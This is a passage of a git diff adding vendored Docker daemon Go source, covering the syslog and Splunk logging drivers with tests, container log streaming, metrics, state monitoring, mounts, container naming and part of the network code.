hec.test.Errorf("Connection should not be verified more than once. Got second request with %s method.", request.Method) + } + hec.connectionVerified = true + writer.WriteHeader(http.StatusOK) + case http.MethodPost: + // Always verify that Driver is using correct path to HEC + if request.URL.String() != "/services/collector/event/1.0" { + hec.test.Errorf("Unexpected path %v", request.URL) + } + defer request.Body.Close() + + if authorization, ok := request.Header["Authorization"]; !ok || authorization[0] != ("Splunk "+hec.token) { + hec.test.Error("Authorization header is invalid.") + } + + gzipEnabled := false + if contentEncoding, ok := request.Header["Content-Encoding"]; ok && contentEncoding[0] == "gzip" { + gzipEnabled = true + } + + if hec.gzipEnabled == nil { + hec.gzipEnabled = &gzipEnabled + } else if gzipEnabled != *hec.gzipEnabled { + // Nothing wrong with that, but we just know that Splunk Logging Driver does not do that + hec.test.Error("Driver should not change Content Encoding.") + } + + var gzipReader *gzip.Reader + var reader io.Reader + if gzipEnabled { + gzipReader, err = gzip.NewReader(request.Body) + if err != nil { + hec.test.Fatal(err) + } + reader = gzipReader + } else { + reader = request.Body + } + + // Read body + var body []byte + body, err = ioutil.ReadAll(reader) + if err != nil { + hec.test.Fatal(err) + } + + // Parse message + messageStart := 0 + for i := 0; i < len(body); i++ { + if i == len(body)-1 || (body[i] == '}' && body[i+1] == '{') { + var message splunkMessage + err = json.Unmarshal(body[messageStart:i+1], &message) + if err != nil { + hec.test.Log(string(body[messageStart : i+1])) + hec.test.Fatal(err) + } + hec.messages = append(hec.messages, &message) + messageStart = i + 1 + } + } + + if gzipEnabled { + gzipReader.Close() + } + + writer.WriteHeader(http.StatusOK) + default: + hec.test.Errorf("Unexpected HTTP method %s", http.MethodOptions) + writer.WriteHeader(http.StatusBadRequest) + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go new file mode 100644 index 0000000000..fb9e867ff5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go @@ -0,0 +1,262 @@ +// Package syslog provides the logdriver for forwarding server logs to syslog endpoints. +package syslog + +import ( + "crypto/tls" + "errors" + "fmt" + "net" + "net/url" + "os" + "strconv" + "strings" + "time" + + syslog "github.com/RackSec/srslog" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/urlutil" + "github.com/docker/go-connections/tlsconfig" +) + +const ( + name = "syslog" + secureProto = "tcp+tls" +) + +var facilities = map[string]syslog.Priority{ + "kern": syslog.LOG_KERN, + "user": syslog.LOG_USER, + "mail": syslog.LOG_MAIL, + "daemon": syslog.LOG_DAEMON, + "auth": syslog.LOG_AUTH, + "syslog": syslog.LOG_SYSLOG, + "lpr": syslog.LOG_LPR, + "news": syslog.LOG_NEWS, + "uucp": syslog.LOG_UUCP, + "cron": syslog.LOG_CRON, + "authpriv": syslog.LOG_AUTHPRIV, + "ftp": syslog.LOG_FTP, + "local0": syslog.LOG_LOCAL0, + "local1": syslog.LOG_LOCAL1, + "local2": syslog.LOG_LOCAL2, + "local3": syslog.LOG_LOCAL3, + "local4": syslog.LOG_LOCAL4, + "local5": syslog.LOG_LOCAL5, + "local6": syslog.LOG_LOCAL6, + "local7": syslog.LOG_LOCAL7, +} + +type syslogger struct { + writer *syslog.Writer +} + +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// rsyslog uses appname part of syslog message to fill in an %syslogtag% template +// attribute in rsyslog.conf. In order to be backward compatible to rfc3164 +// tag will be also used as an appname +func rfc5424formatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string { + timestamp := time.Now().Format(time.RFC3339) + pid := os.Getpid() + msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s", + p, 1, timestamp, hostname, tag, pid, tag, content) + return msg +} + +// The timestamp field in rfc5424 is derived from rfc3339. Whereas rfc3339 makes allowances +// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximium +// resolution is limited to "TIME-SECFRAC" which is 6 (microsecond resolution) +func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string { + timestamp := time.Now().Format("2006-01-02T15:04:05.999999Z07:00") + pid := os.Getpid() + msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s", + p, 1, timestamp, hostname, tag, pid, tag, content) + return msg +} + +// New creates a syslog logger using the configuration passed in on +// the context. Supported context configuration variables are +// syslog-address, syslog-facility, syslog-format. +func New(ctx logger.Context) (logger.Logger, error) { + tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if err != nil { + return nil, err + } + + proto, address, err := parseAddress(ctx.Config["syslog-address"]) + if err != nil { + return nil, err + } + + facility, err := parseFacility(ctx.Config["syslog-facility"]) + if err != nil { + return nil, err + } + + syslogFormatter, syslogFramer, err := parseLogFormat(ctx.Config["syslog-format"], proto) + if err != nil { + return nil, err + } + + var log *syslog.Writer + if proto == secureProto { + tlsConfig, tlsErr := parseTLSConfig(ctx.Config) + if tlsErr != nil { + return nil, tlsErr + } + log, err = syslog.DialWithTLSConfig(proto, address, facility, tag, tlsConfig) + } else { + log, err = syslog.Dial(proto, address, facility, tag) + } + + if err != nil { + return nil, err + } + + log.SetFormatter(syslogFormatter) + log.SetFramer(syslogFramer) + + return &syslogger{ + writer: log, + }, nil +} + +func (s *syslogger) Log(msg *logger.Message) error { + if msg.Source == "stderr" { + return s.writer.Err(string(msg.Line)) + } + return s.writer.Info(string(msg.Line)) +} + +func (s *syslogger) Close() error { + return s.writer.Close() +} + +func (s *syslogger) Name() string { + return name +} + +func parseAddress(address string) (string, string, error) { + if address == "" { + return "", "", nil + } + if !urlutil.IsTransportURL(address) { + return "", "", fmt.Errorf("syslog-address should be in form proto://address, got %v", address) + } + url, err := url.Parse(address) + if err != nil { + return "", "", err + } + + // unix and unixgram socket validation + if url.Scheme == "unix" || url.Scheme == "unixgram" { + if _, err := os.Stat(url.Path); err != nil { + return "", "", err + } + return url.Scheme, url.Path, nil + } + + // here we process tcp|udp + host := url.Host + if _, _, err := net.SplitHostPort(host); err != nil { + if !strings.Contains(err.Error(), "missing port in address") { + return "", "", err + } + host = host + ":514" + } + + return url.Scheme, host, nil +} + +// ValidateLogOpt looks for syslog specific log options +// syslog-address, syslog-facility. +func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case "env": + case "labels": + case "syslog-address": + case "syslog-facility": + case "syslog-tls-ca-cert": + case "syslog-tls-cert": + case "syslog-tls-key": + case "syslog-tls-skip-verify": + case "tag": + case "syslog-format": + default: + return fmt.Errorf("unknown log opt '%s' for syslog log driver", key) + } + } + if _, _, err := parseAddress(cfg["syslog-address"]); err != nil { + return err + } + if _, err := parseFacility(cfg["syslog-facility"]); err != nil { + return err + } + if _, _, err := parseLogFormat(cfg["syslog-format"], ""); err != nil { + return err + } + return nil +} + +func parseFacility(facility string) (syslog.Priority, error) { + if facility == "" { + return syslog.LOG_DAEMON, nil + } + + if syslogFacility, valid := facilities[facility]; valid { + return syslogFacility, nil + } + + fInt, err := strconv.Atoi(facility) + if err == nil && 0 <= fInt && fInt <= 23 { + return syslog.Priority(fInt << 3), nil + } + + return syslog.Priority(0), errors.New("invalid syslog facility") +} + +func parseTLSConfig(cfg map[string]string) (*tls.Config, error) { + _, skipVerify := cfg["syslog-tls-skip-verify"] + + opts := tlsconfig.Options{ + CAFile: cfg["syslog-tls-ca-cert"], + CertFile: cfg["syslog-tls-cert"], + KeyFile: cfg["syslog-tls-key"], + InsecureSkipVerify: skipVerify, + } + + return tlsconfig.Client(opts) +} + +func parseLogFormat(logFormat, proto string) (syslog.Formatter, syslog.Framer, error) { + switch logFormat { + case "": + return syslog.UnixFormatter, syslog.DefaultFramer, nil + case "rfc3164": + return syslog.RFC3164Formatter, syslog.DefaultFramer, nil + case "rfc5424": + if proto == secureProto { + return rfc5424formatterWithAppNameAsTag, syslog.RFC5425MessageLengthFramer, nil + } + return rfc5424formatterWithAppNameAsTag, syslog.DefaultFramer, nil + case "rfc5424micro": + if proto == secureProto { + return rfc5424microformatterWithAppNameAsTag, syslog.RFC5425MessageLengthFramer, nil + } + return rfc5424microformatterWithAppNameAsTag, syslog.DefaultFramer, nil + default: + return nil, nil, errors.New("Invalid syslog format") + } + +} diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go new file mode 100644 index 0000000000..501561064b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go @@ -0,0 +1,62 @@ +package syslog + +import ( + "reflect" + "testing" + + syslog "github.com/RackSec/srslog" +) + +func functionMatches(expectedFun interface{}, actualFun interface{}) bool { + return reflect.ValueOf(expectedFun).Pointer() == reflect.ValueOf(actualFun).Pointer() +} + +func TestParseLogFormat(t *testing.T) { + formatter, framer, err := parseLogFormat("rfc5424", "udp") + if err != nil || !functionMatches(rfc5424formatterWithAppNameAsTag, formatter) || + !functionMatches(syslog.DefaultFramer, framer) { + t.Fatal("Failed to parse rfc5424 format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("rfc5424", "tcp+tls") + if err != nil || !functionMatches(rfc5424formatterWithAppNameAsTag, formatter) || + !functionMatches(syslog.RFC5425MessageLengthFramer, framer) { + t.Fatal("Failed to parse rfc5424 format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("rfc5424micro", "udp") + if err != nil || !functionMatches(rfc5424microformatterWithAppNameAsTag, formatter) || + !functionMatches(syslog.DefaultFramer, framer) { + t.Fatal("Failed to parse rfc5424 (microsecond) format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("rfc5424micro", "tcp+tls") + if err != nil || !functionMatches(rfc5424microformatterWithAppNameAsTag, formatter) || + !functionMatches(syslog.RFC5425MessageLengthFramer, framer) { + t.Fatal("Failed to parse rfc5424 (microsecond) format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("rfc3164", "") + if err != nil || !functionMatches(syslog.RFC3164Formatter, formatter) || + !functionMatches(syslog.DefaultFramer, framer) { + t.Fatal("Failed to parse rfc3164 format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("", "") + if err != nil || !functionMatches(syslog.UnixFormatter, formatter) || + !functionMatches(syslog.DefaultFramer, framer) { + t.Fatal("Failed to parse empty format", err, formatter, framer) + } + + formatter, framer, err = parseLogFormat("invalid", "") + if err == nil { + t.Fatal("Failed to parse invalid format", err, formatter, framer) + } +} + +func TestValidateLogOptEmpty(t *testing.T) { + emptyConfig := make(map[string]string) + if err := ValidateLogOpt(emptyConfig); err != nil { + t.Fatal("Failed to parse empty config", err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/logs.go b/vendor/github.com/docker/docker/daemon/logs.go new file mode 100644 index 0000000000..cc34b82083 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logs.go @@ -0,0 +1,142 @@ +package daemon + +import ( + "fmt" + "io" + "strconv" + "time" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types/backend" + containertypes "github.com/docker/docker/api/types/container" + timetypes "github.com/docker/docker/api/types/time" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/stdcopy" +) + +// ContainerLogs hooks up a container's stdout and stderr streams +// configured with the given struct. +func (daemon *Daemon) ContainerLogs(ctx context.Context, containerName string, config *backend.ContainerLogsConfig, started chan struct{}) error { + container, err := daemon.GetContainer(containerName) + if err != nil { + return err + } + + if !(config.ShowStdout || config.ShowStderr) { + return fmt.Errorf("You must choose at least one stream") + } + + cLog, err := daemon.getLogger(container) + if err != nil { + return err + } + logReader, ok := cLog.(logger.LogReader) + if !ok { + return logger.ErrReadLogsNotSupported + } + + follow := config.Follow && container.IsRunning() + tailLines, err := strconv.Atoi(config.Tail) + if err != nil { + tailLines = -1 + } + + logrus.Debug("logs: begin stream") + + var since time.Time + if config.Since != "" { + s, n, err := timetypes.ParseTimestamps(config.Since, 0) + if err != nil { + return err + } + since = time.Unix(s, n) + } + readConfig := logger.ReadConfig{ + Since: since, + Tail: tailLines, + Follow: follow, + } + logs := logReader.ReadLogs(readConfig) + + wf := ioutils.NewWriteFlusher(config.OutStream) + defer wf.Close() + close(started) + wf.Flush() + + var outStream io.Writer + outStream = wf + errStream := outStream + if !container.Config.Tty { + errStream = stdcopy.NewStdWriter(outStream, stdcopy.Stderr) + outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout) + } + + for { + select { + case err := <-logs.Err: + logrus.Errorf("Error streaming logs: %v", err) + return nil + case <-ctx.Done(): + logs.Close() + return nil + case msg, ok := <-logs.Msg: + if !ok { + logrus.Debug("logs: end stream") + logs.Close() + if cLog != container.LogDriver { + // Since the logger isn't cached in the container, which occurs if it is running, it + // must get explicitly closed here to avoid leaking it and any file handles it has. + if err := cLog.Close(); err != nil { + logrus.Errorf("Error closing logger: %v", err) + } + } + return nil + } + logLine := msg.Line + if config.Details { + logLine = append([]byte(msg.Attrs.String()+" "), logLine...) + } + if config.Timestamps { + logLine = append([]byte(msg.Timestamp.Format(logger.TimeFormat)+" "), logLine...) + } + if msg.Source == "stdout" && config.ShowStdout { + outStream.Write(logLine) + } + if msg.Source == "stderr" && config.ShowStderr { + errStream.Write(logLine) + } + } + } +} + +func (daemon *Daemon) getLogger(container *container.Container) (logger.Logger, error) { + if container.LogDriver != nil && container.IsRunning() { + return container.LogDriver, nil + } + return container.StartLogger(container.HostConfig.LogConfig) +} + +// mergeLogConfig merges the daemon log config to the container's log config if the container's log driver is not specified. +func (daemon *Daemon) mergeAndVerifyLogConfig(cfg *containertypes.LogConfig) error { + if cfg.Type == "" { + cfg.Type = daemon.defaultLogConfig.Type + } + + if cfg.Config == nil { + cfg.Config = make(map[string]string) + } + + if cfg.Type == daemon.defaultLogConfig.Type { + for k, v := range daemon.defaultLogConfig.Config { + if _, ok := cfg.Config[k]; !ok { + cfg.Config[k] = v + } + } + } + + return logger.ValidateLogOpts(cfg.Type, cfg.Config) +} diff --git a/vendor/github.com/docker/docker/daemon/logs_test.go b/vendor/github.com/docker/docker/daemon/logs_test.go new file mode 100644 index 0000000000..0c36299e09 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logs_test.go @@ -0,0 +1,15 @@ +package daemon + +import ( + "testing" + + containertypes "github.com/docker/docker/api/types/container" +) + +func TestMergeAndVerifyLogConfigNilConfig(t *testing.T) { + d := &Daemon{defaultLogConfig: containertypes.LogConfig{Type: "json-file", Config: map[string]string{"max-file": "1"}}} + cfg := containertypes.LogConfig{Type: d.defaultLogConfig.Type} + if err := d.mergeAndVerifyLogConfig(&cfg); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/metrics.go b/vendor/github.com/docker/docker/daemon/metrics.go new file mode 100644 index 0000000000..69dbfd9378 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/metrics.go @@ -0,0 +1,42 @@ +package daemon + +import "github.com/docker/go-metrics" + +var ( + containerActions metrics.LabeledTimer + imageActions metrics.LabeledTimer + networkActions metrics.LabeledTimer + engineVersion metrics.LabeledGauge + engineCpus metrics.Gauge + engineMemory metrics.Gauge + healthChecksCounter metrics.Counter + healthChecksFailedCounter metrics.Counter +) + +func init() { + ns := metrics.NewNamespace("engine", "daemon", nil) + containerActions = ns.NewLabeledTimer("container_actions", "The number of seconds it takes to process each container action", "action") + for _, a := range []string{ + "start", + "changes", + "commit", + "create", + "delete", + } { + containerActions.WithValues(a).Update(0) + } + networkActions = ns.NewLabeledTimer("network_actions", "The number of seconds it takes to process each network action", "action") + engineVersion = ns.NewLabeledGauge("engine", "The version and commit information for the engine process", metrics.Unit("info"), + "version", + "commit", + "architecture", + "graph_driver", "kernel", + "os", + ) + engineCpus = ns.NewGauge("engine_cpus", "The number of cpus that the host system of the engine has", metrics.Unit("cpus")) + engineMemory = ns.NewGauge("engine_memory", "The number of bytes of memory that the host system of the engine has", metrics.Bytes) + healthChecksCounter = ns.NewCounter("health_checks", "The total number of health checks") + healthChecksFailedCounter = ns.NewCounter("health_checks_failed", "The total number of failed health checks") + imageActions = ns.NewLabeledTimer("image_actions", "The number of seconds it takes to process each image action", "action") + metrics.Register(ns) +} diff --git a/vendor/github.com/docker/docker/daemon/monitor.go b/vendor/github.com/docker/docker/daemon/monitor.go new file mode 100644 index 0000000000..ee0d1fcce0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/monitor.go @@ -0,0 +1,132 @@ +package daemon + +import ( + "errors" + "fmt" + "runtime" + "strconv" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/restartmanager" +) + +// StateChanged updates daemon state changes from containerd +func (daemon *Daemon) StateChanged(id string, e libcontainerd.StateInfo) error { + c := daemon.containers.Get(id) + if c == nil { + return fmt.Errorf("no such container: %s", id) + } + + switch e.State { + case libcontainerd.StateOOM: + // StateOOM is Linux specific and should never be hit on Windows + if runtime.GOOS == "windows" { + return errors.New("Received StateOOM from libcontainerd on Windows. This should never happen.") + } + daemon.updateHealthMonitor(c) + daemon.LogContainerEvent(c, "oom") + case libcontainerd.StateExit: + // if container's AutoRemove flag is set, remove it after clean up + autoRemove := func() { + if c.HostConfig.AutoRemove { + if err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil { + logrus.Errorf("can't remove container %s: %v", c.ID, err) + } + } + } + + c.Lock() + c.StreamConfig.Wait() + c.Reset(false) + + restart, wait, err := c.RestartManager().ShouldRestart(e.ExitCode, false, time.Since(c.StartedAt)) + if err == nil && restart { + c.RestartCount++ + c.SetRestarting(platformConstructExitStatus(e)) + } else { + c.SetStopped(platformConstructExitStatus(e)) + defer autoRemove() + } + + daemon.updateHealthMonitor(c) + attributes := map[string]string{ + "exitCode": strconv.Itoa(int(e.ExitCode)), + } + daemon.LogContainerEventWithAttributes(c, "die", attributes) + daemon.Cleanup(c) + + if err == nil && restart { + go func() { + err := <-wait + if err == nil { + if err = daemon.containerStart(c, "", "", false); err != nil { + logrus.Debugf("failed to restart container: %+v", err) + } + } + if err != nil { + c.SetStopped(platformConstructExitStatus(e)) + defer autoRemove() + if err != restartmanager.ErrRestartCanceled { + logrus.Errorf("restartmanger wait error: %+v", err) + } + } + }() + } + + defer c.Unlock() + if err := c.ToDisk(); err != nil { + return err + } + return daemon.postRunProcessing(c, e) + case libcontainerd.StateExitProcess: + if execConfig := c.ExecCommands.Get(e.ProcessID); execConfig != nil { + ec := int(e.ExitCode) + execConfig.Lock() + defer execConfig.Unlock() + execConfig.ExitCode = &ec + execConfig.Running = false + execConfig.StreamConfig.Wait() + if err := execConfig.CloseStreams(); err != nil { + logrus.Errorf("%s: %s", c.ID, err) + } + + // remove the exec command from the container's store only and not the + // daemon's store so that the exec command can be inspected. + c.ExecCommands.Delete(execConfig.ID) + } else { + logrus.Warnf("Ignoring StateExitProcess for %v but no exec command found", e) + } + case libcontainerd.StateStart, libcontainerd.StateRestore: + // Container is already locked in this case + c.SetRunning(int(e.Pid), e.State == libcontainerd.StateStart) + c.HasBeenManuallyStopped = false + c.HasBeenStartedBefore = true + if err := c.ToDisk(); err != nil { + c.Reset(false) + return err + } + daemon.initHealthMonitor(c) + daemon.LogContainerEvent(c, "start") + case libcontainerd.StatePause: + // Container is already locked in this case + c.Paused = true + if err := c.ToDisk(); err != nil { + return err + } + daemon.updateHealthMonitor(c) + daemon.LogContainerEvent(c, "pause") + case libcontainerd.StateResume: + // Container is already locked in this case + c.Paused = false + if err := c.ToDisk(); err != nil { + return err + } + daemon.updateHealthMonitor(c) + daemon.LogContainerEvent(c, "unpause") + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/monitor_linux.go b/vendor/github.com/docker/docker/daemon/monitor_linux.go new file mode 100644 index 0000000000..09f5af50c6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/monitor_linux.go @@ -0,0 +1,19 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/libcontainerd" +) + +// platformConstructExitStatus returns a platform specific exit status structure +func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { + return &container.ExitStatus{ + ExitCode: int(e.ExitCode), + OOMKilled: e.OOMKilled, + } +} + +// postRunProcessing perfoms any processing needed on the container after it has stopped. +func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/monitor_solaris.go b/vendor/github.com/docker/docker/daemon/monitor_solaris.go new file mode 100644 index 0000000000..5ccfada76a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/monitor_solaris.go @@ -0,0 +1,18 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/libcontainerd" +) + +// platformConstructExitStatus returns a platform specific exit status structure +func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { + return &container.ExitStatus{ + ExitCode: int(e.ExitCode), + } +} + +// postRunProcessing perfoms any processing needed on the container after it has stopped. +func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/monitor_windows.go b/vendor/github.com/docker/docker/daemon/monitor_windows.go new file mode 100644 index 0000000000..9648b1b415 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/monitor_windows.go @@ -0,0 +1,46 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/container" + "github.com/docker/docker/libcontainerd" +) + +// platformConstructExitStatus returns a platform specific exit status structure +func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { + return &container.ExitStatus{ + ExitCode: int(e.ExitCode), + } +} + +// postRunProcessing perfoms any processing needed on the container after it has stopped. +func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { + if e.ExitCode == 0 && e.UpdatePending { + spec, err := daemon.createSpec(container) + if err != nil { + return err + } + + newOpts := []libcontainerd.CreateOption{&libcontainerd.ServicingOption{ + IsServicing: true, + }} + + copts, err := daemon.getLibcontainerdCreateOptions(container) + if err != nil { + return err + } + + if copts != nil { + newOpts = append(newOpts, copts...) + } + + // Create a new servicing container, which will start, complete the update, and merge back the + // results if it succeeded, all as part of the below function call. + if err := daemon.containerd.Create((container.ID + "_servicing"), "", "", *spec, container.InitializeStdio, newOpts...); err != nil { + container.SetExitCode(-1) + return fmt.Errorf("Post-run update servicing failed: %s", err) + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/mounts.go b/vendor/github.com/docker/docker/daemon/mounts.go new file mode 100644 index 0000000000..1c11f86a80 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/mounts.go @@ -0,0 +1,48 @@ +package daemon + +import ( + "fmt" + "strings" + + "github.com/docker/docker/container" + volumestore "github.com/docker/docker/volume/store" +) + +func (daemon *Daemon) prepareMountPoints(container *container.Container) error { + for _, config := range container.MountPoints { + if err := daemon.lazyInitializeVolume(container.ID, config); err != nil { + return err + } + } + return nil +} + +func (daemon *Daemon) removeMountPoints(container *container.Container, rm bool) error { + var rmErrors []string + for _, m := range container.MountPoints { + if m.Volume == nil { + continue + } + daemon.volumes.Dereference(m.Volume, container.ID) + if rm { + // Do not remove named mountpoints + // these are mountpoints specified like `docker run -v :/foo` + if m.Spec.Source != "" { + continue + } + err := daemon.volumes.Remove(m.Volume) + // Ignore volume in use errors because having this + // volume being referenced by other container is + // not an error, but an implementation detail. + // This prevents docker from logging "ERROR: Volume in use" + // where there is another container using the volume. + if err != nil && !volumestore.IsInUse(err) { + rmErrors = append(rmErrors, err.Error()) + } + } + } + if len(rmErrors) > 0 { + return fmt.Errorf("Error removing volumes:\n%v", strings.Join(rmErrors, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/names.go b/vendor/github.com/docker/docker/daemon/names.go new file mode 100644 index 0000000000..273d551513 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/names.go @@ -0,0 +1,116 @@ +package daemon + +import ( + "fmt" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/namesgenerator" + "github.com/docker/docker/pkg/registrar" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/utils" +) + +var ( + validContainerNameChars = utils.RestrictedNameChars + validContainerNamePattern = utils.RestrictedNamePattern +) + +func (daemon *Daemon) registerName(container *container.Container) error { + if daemon.Exists(container.ID) { + return fmt.Errorf("Container is already loaded") + } + if err := validateID(container.ID); err != nil { + return err + } + if container.Name == "" { + name, err := daemon.generateNewName(container.ID) + if err != nil { + return err + } + container.Name = name + + if err := container.ToDiskLocking(); err != nil { + logrus.Errorf("Error saving container name to disk: %v", err) + } + } + return daemon.nameIndex.Reserve(container.Name, container.ID) +} + +func (daemon *Daemon) generateIDAndName(name string) (string, string, error) { + var ( + err error + id = stringid.GenerateNonCryptoID() + ) + + if name == "" { + if name, err = daemon.generateNewName(id); err != nil { + return "", "", err + } + return id, name, nil + } + + if name, err = daemon.reserveName(id, name); err != nil { + return "", "", err + } + + return id, name, nil +} + +func (daemon *Daemon) reserveName(id, name string) (string, error) { + if !validContainerNamePattern.MatchString(strings.TrimPrefix(name, "/")) { + return "", fmt.Errorf("Invalid container name (%s), only %s are allowed", name, validContainerNameChars) + } + if name[0] != '/' { + name = "/" + name + } + + if err := daemon.nameIndex.Reserve(name, id); err != nil { + if err == registrar.ErrNameReserved { + id, err := daemon.nameIndex.Get(name) + if err != nil { + logrus.Errorf("got unexpected error while looking up reserved name: %v", err) + return "", err + } + return "", fmt.Errorf("Conflict. The container name %q is already in use by container %s. You have to remove (or rename) that container to be able to reuse that name.", name, id) + } + return "", fmt.Errorf("error reserving name: %s, error: %v", name, err) + } + return name, nil +} + +func (daemon *Daemon) releaseName(name string) { + daemon.nameIndex.Release(name) +} + +func (daemon *Daemon) generateNewName(id string) (string, error) { + var name string + for i := 0; i < 6; i++ { + name = namesgenerator.GetRandomName(i) + if name[0] != '/' { + name = "/" + name + } + + if err := daemon.nameIndex.Reserve(name, id); err != nil { + if err == registrar.ErrNameReserved { + continue + } + return "", err + } + return name, nil + } + + name = "/" + stringid.TruncateID(id) + if err := daemon.nameIndex.Reserve(name, id); err != nil { + return "", err + } + return name, nil +} + +func validateID(id string) error { + if id == "" { + return fmt.Errorf("Invalid empty id") + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/network.go b/vendor/github.com/docker/docker/daemon/network.go new file mode 100644 index 0000000000..ab8fd88da8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/network.go @@ -0,0 +1,498 @@ +package daemon + +import ( + "fmt" + "net" + "runtime" + "sort" + "strings" + + "github.com/Sirupsen/logrus" + apierrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + clustertypes "github.com/docker/docker/daemon/cluster/provider" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/runconfig" + "github.com/docker/libnetwork" + "github.com/docker/libnetwork/driverapi" + "github.com/docker/libnetwork/ipamapi" + networktypes "github.com/docker/libnetwork/types" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +// NetworkControllerEnabled checks if the networking stack is enabled. +// This feature depends on OS primitives and it's disabled in systems like Windows. +func (daemon *Daemon) NetworkControllerEnabled() bool { + return daemon.netController != nil +} + +// FindNetwork function finds a network for a given string that can represent network name or id +func (daemon *Daemon) FindNetwork(idName string) (libnetwork.Network, error) { + // Find by Name + n, err := daemon.GetNetworkByName(idName) + if err != nil && !isNoSuchNetworkError(err) { + return nil, err + } + + if n != nil { + return n, nil + } + + // Find by id + return daemon.GetNetworkByID(idName) +} + +func isNoSuchNetworkError(err error) bool { + _, ok := err.(libnetwork.ErrNoSuchNetwork) + return ok +} + +// GetNetworkByID function returns a network whose ID begins with the given prefix. +// It fails with an error if no matching, or more than one matching, networks are found. +func (daemon *Daemon) GetNetworkByID(partialID string) (libnetwork.Network, error) { + list := daemon.GetNetworksByID(partialID) + + if len(list) == 0 { + return nil, libnetwork.ErrNoSuchNetwork(partialID) + } + if len(list) > 1 { + return nil, libnetwork.ErrInvalidID(partialID) + } + return list[0], nil +} + +// GetNetworkByName function returns a network for a given network name. +// If no network name is given, the default network is returned. +func (daemon *Daemon) GetNetworkByName(name string) (libnetwork.Network, error) { + c := daemon.netController + if c == nil { + return nil, libnetwork.ErrNoSuchNetwork(name) + } + if name == "" { + name = c.Config().Daemon.DefaultNetwork + } + return c.NetworkByName(name) +} + +// GetNetworksByID returns a list of networks whose ID partially matches zero or more networks +func (daemon *Daemon) GetNetworksByID(partialID string) []libnetwork.Network { + c := daemon.netController + if c == nil { + return nil + } + list := []libnetwork.Network{} + l := func(nw libnetwork.Network) bool { + if strings.HasPrefix(nw.ID(), partialID) { + list = append(list, nw) + } + return false + } + c.WalkNetworks(l) + + return list +} + +// getAllNetworks returns a list containing all networks +func (daemon *Daemon) getAllNetworks() []libnetwork.Network { + c := daemon.netController + list := []libnetwork.Network{} + l := func(nw libnetwork.Network) bool { + list = append(list, nw) + return false + } + c.WalkNetworks(l) + + return list +} + +func isIngressNetwork(name string) bool { + return name == "ingress" +} + +var ingressChan = make(chan struct{}, 1) + +func ingressWait() func() { + ingressChan <- struct{}{} + return func() { <-ingressChan } +} + +// SetupIngress setups ingress networking. +func (daemon *Daemon) SetupIngress(create clustertypes.NetworkCreateRequest, nodeIP string) error { + ip, _, err := 